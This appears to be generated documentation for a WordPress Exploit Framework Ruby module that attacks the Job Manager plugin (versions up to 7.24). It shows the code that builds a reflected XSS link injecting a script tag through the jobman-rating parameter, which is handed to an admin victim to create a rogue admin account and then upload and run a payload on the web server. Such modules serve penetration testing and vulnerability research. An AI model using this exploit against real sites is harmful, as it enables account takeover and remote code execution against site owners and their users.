class Wpxf::Exploit::JobManagerReflectedXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/reflected/job_manager_reflected_xss_shell_upload.rb, line 10
def initialize
  super

  update_info(
    name: 'Job Manager <= 7.24 Reflected XSS Shell Upload',
    desc: 'This module prepares a payload and link that can be sent to an '\
          'admin user which when visited with a valid session will create '\
          'a new admin user which will be used to upload and execute the '\
          'selected payload in the context of the web server.',
    author: [
      'Marcin Probola', # Discovery and disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['WPVDB', '8313'],
      ['URL', 'http://cinu.pl/research/wp-plugins/mail_1dfacc7d899e69599b017c068d50809d.html']
    ],
    date: 'Aug 25 2015'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/job_manager_reflected_xss_shell_upload.rb, line 31
def check
  check_plugin_version_from_readme('job-manager', '7.25')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/reflected/job_manager_reflected_xss_shell_upload.rb, line 43
def run
  return false unless super

  @success = false
  emit_info 'Provide the URL below to the victim to begin the payload upload'
  puts
  puts url_with_xss
  puts

  start_http_server
  return @success
end
url_with_xss() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/job_manager_reflected_xss_shell_upload.rb, line 35
def url_with_xss
  normalize_uri(
    wordpress_url_admin,
    "admin.php?page=jobman-list-applications"\
    "&jobman-rating=#{url_encode("\"><script>#{xss_include_script}</script>")}"
  )
end